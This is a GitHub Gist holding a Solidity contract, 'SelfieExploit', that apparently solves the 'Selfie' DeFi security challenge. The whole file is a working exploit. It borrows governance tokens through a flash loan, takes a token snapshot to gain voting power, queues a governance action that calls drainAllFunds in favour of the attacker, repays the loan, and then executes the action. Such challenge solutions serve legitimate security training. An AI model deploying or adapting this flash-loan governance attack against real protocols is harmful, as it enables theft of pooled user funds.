Created
January 28, 2023 18:29
-
-
Save az0mb13/ec8411ce67aedee58ccd5e46c72ab9d3 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
interface ISelfiePool { | |
function flashLoan(uint256 borrowAmount) external; | |
} | |
interface ISimpleGovernance { | |
function executeAction(uint256 actionId) external payable; | |
function queueAction( | |
address receiver, | |
bytes calldata data, | |
uint256 weiAmount | |
) external returns (uint256); | |
} | |
interface ITokenSnapshot { | |
function transfer(address recipient, uint256 amount) | |
external | |
returns (bool); | |
function snapshot() external returns (uint256); | |
} | |
contract SelfieExploit { | |
ISelfiePool public immutable pool; | |
address attacker; | |
ISimpleGovernance public immutable gov; | |
uint256 actionId; | |
constructor( | |
address _pool, | |
address _attacker, | |
address _gov | |
) { | |
pool = ISelfiePool(_pool); | |
attacker = _attacker; | |
gov = ISimpleGovernance(_gov); | |
} | |
function attack(uint256 borrowAmount) external { | |
pool.flashLoan(borrowAmount); | |
} | |
function receiveTokens(address token, uint256 borrowAmount) public { | |
ITokenSnapshot(token).snapshot(); | |
actionId = gov.queueAction( | |
address(pool), | |
abi.encodeWithSignature("drainAllFunds(address)", attacker), | |
0 | |
); | |
ITokenSnapshot(token).transfer(address(pool), borrowAmount); | |
} | |
function execute() external { | |
gov.executeAction(actionId); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment